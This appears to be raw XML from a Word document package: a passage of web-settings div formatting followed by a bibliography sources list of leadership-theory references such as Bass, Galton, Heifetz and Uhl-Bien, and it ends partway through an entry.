          </w:divBdr>
          <w:divsChild>
            <w:div w:id="507255412">
              <w:marLeft w:val="270"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="30"/>
              <w:marBottom w:val="180"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="24" w:space="0" w:color="4A5F77"/>
                <w:left w:val="single" w:sz="24" w:space="0" w:color="4A5F77"/>
                <w:bottom w:val="single" w:sz="24" w:space="0" w:color="4A5F77"/>
                <w:right w:val="single" w:sz="24" w:space="0" w:color="4A5F77"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1794208264">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="270"/>
              <w:marTop w:val="30"/>
              <w:marBottom w:val="180"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1503084531">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="270"/>
              <w:marTop w:val="30"/>
              <w:marBottom w:val="180"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="145754132">
              <w:marLeft w:val="270"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="30"/>
              <w:marBottom w:val="180"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="584532156">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="270"/>
              <w:marTop w:val="30"/>
              <w:marBottom w:val="180"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="969479065">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1193836291">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="FFFFFF"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="848758282">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1665204509">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1674991241">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="2094662081">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="1254709211">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="1100880466">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="1161460393">
                                      <w:marLeft w:val="3150"/>
                                      <w:marRight w:val="3150"/>
                                      <w:marTop w:val="0"/>
                                      <w:marBottom w:val="0"/>
                                      <w:divBdr>
                                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                      </w:divBdr>
                                      <w:divsChild>
                                        <w:div w:id="1544487214">
                                          <w:marLeft w:val="90"/>
                                          <w:marRight w:val="90"/>
                                          <w:marTop w:val="0"/>
                                          <w:marBottom w:val="180"/>
                                          <w:divBdr>
                                            <w:top w:val="single" w:sz="6" w:space="9" w:color="B2B1B1"/>
                                            <w:left w:val="single" w:sz="6" w:space="9" w:color="B2B1B1"/>
                                            <w:bottom w:val="single" w:sz="6" w:space="9" w:color="B2B1B1"/>
                                            <w:right w:val="single" w:sz="6" w:space="9" w:color="B2B1B1"/>
                                          </w:divBdr>
                                          <w:divsChild>
                                            <w:div w:id="16735331">
                                              <w:marLeft w:val="0"/>
                                              <w:marRight w:val="0"/>
                                              <w:marTop w:val="0"/>
                                              <w:marBottom w:val="0"/>
                                              <w:divBdr>
                                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                              </w:divBdr>
                                              <w:divsChild>
                                                <w:div w:id="20957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54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Bas08</b:Tag>
    <b:SourceType>Book</b:SourceType>
    <b:Guid>{6A5DEB6D-CC32-4174-9B9E-6F8F43F84AB9}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Bass</b:Last>
            <b:First>Bernard</b:First>
            <b:Middle>M</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Bass</b:Last>
            <b:First>Ruth</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>The Bass Handbook of Leadership; Theory, Research, and Managerial Applications</b:Title>
    <b:Year>2008</b:Year>
    <b:City>New York</b:City>
    <b:Publisher>Free Press</b:Publisher>
    <b:RefOrder>4</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Plu92</b:Tag>
    <b:SourceType>Book</b:SourceType>
    <b:Guid>{BC71774B-FFC7-409B-B3F4-8573A335E670}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Plutarch</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Plutarch's Lives Volume III</b:Title>
    <b:Year>1892</b:Year>
    <b:City>London</b:City>
    <b:Publisher>George Bell &amp; Sons</b:Publisher>
    <b:RefOrder>27</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Gal06</b:Tag>
    <b:SourceType>Book</b:SourceType>
    <b:Guid>{46A7825D-9EF5-43B7-9CC0-37E9ADAFA2BF}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Galton</b:Last>
            <b:First>Francis</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Schuster</b:Last>
            <b:First>Edgar</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Noteworthy Families</b:Title>
    <b:Year>1906</b:Year>
    <b:City>London</b:City>
    <b:Publisher>John Murray</b:Publisher>
    <b:RefOrder>28</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Gal69</b:Tag>
    <b:SourceType>Book</b:SourceType>
    <b:Guid>{64C2350E-5D98-4641-BA58-EE8CB541E8C2}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Galton</b:Last>
            <b:First>Francis</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Hereditary Genius</b:Title>
    <b:Year>1869</b:Year>
    <b:City>London</b:City>
    <b:Publisher>Macmillan and Co</b:Publisher>
    <b:RefOrder>6</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Kha13</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{D4E98995-F72E-4304-9737-F471958ACF81}</b:Guid>
    <b:Title>Approaches in Leadership: Trait, Situational and Path-Goal Theory: A Critical Analysis</b:Title>
    <b:Year>2013</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Khan</b:Last>
            <b:First>Adnan</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>Pakistan Business Review</b:JournalName>
    <b:Pages>830-842</b:Pages>
    <b:Volume>14</b:Volume>
    <b:Issue>4</b:Issue>
    <b:RefOrder>7</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Spe73</b:Tag>
    <b:SourceType>Book</b:SourceType>
    <b:Guid>{987D737A-1ACB-46BD-A547-BCFC67A543D3}</b:Guid>
    <b:Title>The Study of Sociology</b:Title>
    <b:Year>1873</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Spencer</b:Last>
            <b:First>Herbert</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:RefOrder>29</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Com13</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{19EDF30F-DA97-49A6-9ADB-17D13D11084B}</b:Guid>
    <b:Title>Catalogue</b:Title>
    <b:Year>2013</b:Year>
    <b:Author>
      <b:Author>
        <b:Corporate>Commonwealth of Australia</b:Corporate>
      </b:Author>
    </b:Author>
    <b:YearAccessed>2013</b:YearAccessed>
    <b:MonthAccessed>March</b:MonthAccessed>
    <b:DayAccessed>19</b:DayAccessed>
    <b:URL>www.nla.gov.au</b:URL>
    <b:RefOrder>1</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Ama13</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{E14CA93E-495B-4615-AC31-B1552BF19D10}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Amazon.com</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>Search page</b:Title>
    <b:Year>2013</b:Year>
    <b:YearAccessed>2013</b:YearAccessed>
    <b:MonthAccessed>March</b:MonthAccessed>
    <b:DayAccessed>19</b:DayAccessed>
    <b:URL>www.amazon.com</b:URL>
    <b:RefOrder>2</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Goo13</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{0363A893-6706-4036-8B05-472068275AEC}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Google Scholar</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>search page</b:Title>
    <b:Year>2013</b:Year>
    <b:YearAccessed>2013</b:YearAccessed>
    <b:MonthAccessed>March</b:MonthAccessed>
    <b:DayAccessed>19</b:DayAccessed>
    <b:URL>www.scholar.google.com</b:URL>
    <b:RefOrder>3</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mit70</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{FC37BCD9-CF35-4210-9BA3-E7FBEEBC2CF0}</b:Guid>
    <b:Title>The Contingency Model: Criticism and Suggestions</b:Title>
    <b:Year>1970</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Mitchell</b:Last>
            <b:First>Terence</b:First>
            <b:Middle>R</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Biglan</b:Last>
            <b:First>Anthony</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Oncken</b:Last>
            <b:First>Gerald</b:First>
            <b:Middle>R</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Fiedler</b:Last>
            <b:First>Fred</b:First>
            <b:Middle>E</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>The Academy of Management Journal</b:JournalName>
    <b:Pages>253-267</b:Pages>
    <b:Volume>13</b:Volume>
    <b:Issue>3</b:Issue>
    <b:RefOrder>8</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Goe05</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{B8579E96-CDF6-41D6-8723-ADEB6ADC8C70}</b:Guid>
    <b:Title>Presidential Leadership</b:Title>
    <b:Year>2005</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Goethals</b:Last>
            <b:First>George</b:First>
            <b:Middle>R</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>Annual Review of Psychology</b:JournalName>
    <b:Pages>545-570</b:Pages>
    <b:Volume>56</b:Volume>
    <b:RefOrder>10</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Her04</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{2A942327-52A2-41E4-A9B7-76F2F70EE637}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Hernez-Broome</b:Last>
            <b:First>Gina</b:First>
            <b:Middle>and Hughes, Richard L</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Leadership Development: Past, Present, and Future</b:Title>
    <b:JournalName>Human Resource Planning</b:JournalName>
    <b:Year>2004</b:Year>
    <b:Pages>24-32</b:Pages>
    <b:Volume>27</b:Volume>
    <b:Issue>1</b:Issue>
    <b:RefOrder>30</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mue08</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{4B553B8E-7E75-4234-BD76-FF853CDDD2C2}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Muenjohn</b:Last>
            <b:First>Nuttawuth</b:First>
            <b:Middle>and Armstrong, Anona</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Evaluating the Structural Validity of the Multifactor Leadership Questionnaire (MLQ), Capturing the Leadership Factors of Tranformational-Transactional Leadership</b:Title>
    <b:JournalName>Contemporary Management Research</b:JournalName>
    <b:Year>2008</b:Year>
    <b:Pages>3-14</b:Pages>
    <b:Volume>4</b:Volume>
    <b:Issue>1</b:Issue>
    <b:RefOrder>31</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Tay99</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{2052DD72-48E9-4358-BDB6-F5C6913C3821}</b:Guid>
    <b:Title>www.fastcompany.com</b:Title>
    <b:Year>1999</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Taylor</b:Last>
            <b:First>William</b:First>
            <b:Middle>C</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:YearAccessed>2013</b:YearAccessed>
    <b:MonthAccessed>April</b:MonthAccessed>
    <b:DayAccessed>5</b:DayAccessed>
    <b:URL>http://www.fastcompany.com/37229/leader-future</b:URL>
    <b:RefOrder>32</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Avo09</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{0D23AB4F-941D-4AA3-921C-3F66736AEA5B}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Avolio</b:Last>
            <b:First>B</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Walumbwa</b:Last>
            <b:First>F</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Weber</b:Last>
            <b:First>T</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Leadership: Current Theories, Research and Future Directions</b:Title>
    <b:JournalName>Annual Review of Psychology</b:JournalName>
    <b:Year>2009</b:Year>
    <b:Pages>421-449</b:Pages>
    <b:Volume>60</b:Volume>
    <b:RefOrder>12</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Che00</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{2E0B05EE-0FDF-4EA7-B327-3B8DA1B29A4E}</b:Guid>
    <b:Title>Leadership Research and Theory: A Functional Integration</b:Title>
    <b:Year>2000</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Chemers</b:Last>
            <b:First>Martin</b:First>
            <b:Middle>M</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>Group Dynamics: Theory, Research and Practice</b:JournalName>
    <b:Pages>27-43</b:Pages>
    <b:Volume>4</b:Volume>
    <b:Issue>1</b:Issue>
    <b:RefOrder>9</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Avo10</b:Tag>
    <b:SourceType>BookSection</b:SourceType>
    <b:Guid>{0B255416-87B7-4532-AF6C-E978E9C01E41}</b:Guid>
    <b:Title>Pursuing Authentic Leadership Development</b:Title>
    <b:Year>2010</b:Year>
    <b:Pages>739-768</b:Pages>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Avolio</b:Last>
            <b:First>Bruce</b:First>
            <b:Middle>J</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
      <b:Editor>
        <b:NameList>
          <b:Person>
            <b:Last>Nohria</b:Last>
            <b:First>Nitin</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Khurana</b:Last>
            <b:First>Rakesh</b:First>
          </b:Person>
        </b:NameList>
      </b:Editor>
    </b:Author>
    <b:BookTitle>Handbook of Leadership Theory and Practice</b:BookTitle>
    <b:City>Cambridge</b:City>
    <b:Publisher>Harvard Business School Publishing Corporation</b:Publisher>
    <b:RefOrder>33</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Lor10</b:Tag>
    <b:SourceType>BookSection</b:SourceType>
    <b:Guid>{8D5F7965-EAF2-4047-9AEB-51A67CD00AE9}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Lorsch</b:Last>
            <b:First>Jay</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
      <b:Editor>
        <b:NameList>
          <b:Person>
            <b:Last>Nohria</b:Last>
            <b:First>Nitin</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Khurana</b:Last>
            <b:First>Rakesh</b:First>
          </b:Person>
        </b:NameList>
      </b:Editor>
    </b:Author>
    <b:Title>A Contingency Theory of Leadership</b:Title>
    <b:BookTitle>Handbook of Leadership Theory and Practice</b:BookTitle>
    <b:Year>2010</b:Year>
    <b:Pages>411-429</b:Pages>
    <b:City>Cambridge</b:City>
    <b:Publisher>Harvard Business School Publishing Corporation</b:Publisher>
    <b:RefOrder>34</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Hei091</b:Tag>
    <b:SourceType>Book</b:SourceType>
    <b:Guid>{85F3A5AB-A447-4C06-B15C-48C59E12CD43}</b:Guid>
    <b:Title>The Practice of Adaptive Leadership; Tools and Tactics for Changing Your Organization and the World</b:Title>
    <b:Year>2009</b:Year>
    <b:City>Boston</b:City>
    <b:Publisher>Harvard Business Press</b:Publisher>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Heifetz</b:Last>
            <b:First>Ronald</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Grashow</b:Last>
            <b:First>Alexander</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Linsky</b:Last>
            <b:First>Marty</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:RefOrder>16</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Cre09</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{EA5D75F3-2B5B-4E64-9741-AF9FA5A87DBC}</b:Guid>
    <b:Title>Creelman Research Thought Leaders: Ron Heifetz Adaptive Leadership</b:Title>
    <b:Year>2009</b:Year>
    <b:Author>
      <b:Interviewee>
        <b:NameList>
          <b:Person>
            <b:Last>Heifetz</b:Last>
            <b:First>R</b:First>
          </b:Person>
        </b:NameList>
      </b:Interviewee>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Creelman</b:Last>
            <b:First>David</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:YearAccessed>2013</b:YearAccessed>
    <b:MonthAccessed>April</b:MonthAccessed>
    <b:DayAccessed>10</b:DayAccessed>
    <b:URL>http://creelmanresearchlibrary.files.wordpress.com/2011/10/creelman-2009-vol-2-5-heifetz-on-adaptive-leadership.pdf</b:URL>
    <b:RefOrder>17</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Hei01</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{B2EB98AC-1DB1-4DDF-A8CD-50285AA8548E}</b:Guid>
    <b:Title>The Work of Leadership</b:Title>
    <b:Year>2001</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Heifetz</b:Last>
            <b:First>Ronald</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Laurie</b:Last>
            <b:First>Donald</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>Harvard Business Review</b:JournalName>
    <b:Volume>5</b:Volume>
    <b:Issue>14</b:Issue>
    <b:RefOrder>35</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Rin08</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{D256ED0D-5F0D-48B1-AC14-B57B4540BD8B}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Ringleb</b:Last>
            <b:First>Al</b:First>
            <b:Middle>H</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Rock</b:Last>
            <b:First>David</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>The emerging field of NeuroLeadership</b:Title>
    <b:JournalName>NeuroLeadership Journal</b:JournalName>
    <b:Year>2008</b:Year>
    <b:Volume>1</b:Volume>
    <b:RefOrder>20</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Roc09</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{98E7E7D1-E56E-4EAD-8684-0738D5E1794E}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Rock</b:Last>
            <b:First>David</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Ringleb</b:Last>
            <b:First>Al</b:First>
            <b:Middle>H</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Defining NeuroLeadership as a field</b:Title>
    <b:JournalName>NeuroLeadership Journal</b:JournalName>
    <b:Year>2009</b:Year>
    <b:Volume>2</b:Volume>
    <b:RefOrder>21</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Roc06</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{B31BD222-7F0B-4B54-BF78-586CAF104E05}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Rock</b:Last>
            <b:First>Daivd</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Schwartz</b:Last>
            <b:First>Jeffrey</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>The Neuroscience of Leadership</b:Title>
    <b:JournalName>Strategy + Business</b:JournalName>
    <b:Year>2006</b:Year>
    <b:Pages>72-83</b:Pages>
    <b:Issue>43</b:Issue>
    <b:RefOrder>22</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Lic06</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{E0E8A6F0-0481-4944-B17A-F96023AE5E06}</b:Guid>
    <b:Title>Complexity leadership theory: An interactive perspective on leading in complex adaptive systems</b:Title>
    <b:Year>2006</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Lichtenstein</b:Last>
            <b:First>B</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Uhl-Bien</b:Last>
            <b:First>M</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Marion</b:Last>
            <b:First>R</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Seers</b:Last>
            <b:First>A</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Orton</b:Last>
            <b:First>JD</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:YearAccessed>2013</b:YearAccessed>
    <b:MonthAccessed>April</b:MonthAccessed>
    <b:DayAccessed>12</b:DayAccessed>
    <b:URL>http://digitalcommons.unl.edu/managementfacpub/8</b:URL>
    <b:RefOrder>25</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Uhl07</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{C98AC9DA-306A-43DB-9412-0BDCE3479D2A}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Uhl-Bien</b:Last>
            <b:First>M</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Marion</b:Last>
            <b:First>R</b:First>
          </b:Person>
          <b:Person>
            <b:Last>McKelvey</b:Last>
            <b:First>B</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Complexity Leadership Theory: Shifting leadership from the industrial age to the knowledge era</b:Title>
    <b:Year>2007</b:Year>
    <b:YearAccessed>2013</b:YearAccessed>
    <b:MonthAccessed>April</b:MonthAccessed>
    <b:DayAccessed>12</b:DayAccessed>
    <b:URL>http://digitalcommons.unl.edu/leadershipfacpub/18</b:URL>
    <b:RefOrder>26</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Ros91</b:Tag>
    <b:SourceType>Book</b:SourceType>
    <b:Guid>{EBB50372-C68F-43E2-BD12-938882FFE72D}</b:Guid>
    <b:Title>Leadership for the 21st Century</b:Title>
    <b:Year>1991</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Rost</b:Last>
            <b:First>Joseph</b:First>
            <b:Middle>C</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:City>New York</b:City>
    <b:Publisher>Praeger</b:Publisher>
    <b:RefOrder>36</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Edw03</b:Tag>
    <b:SourceType>Report</b:SourceType>
    <b:Guid>{AB16BE0F-6E48-416F-85FA-873848EC0A03}</b:Guid>
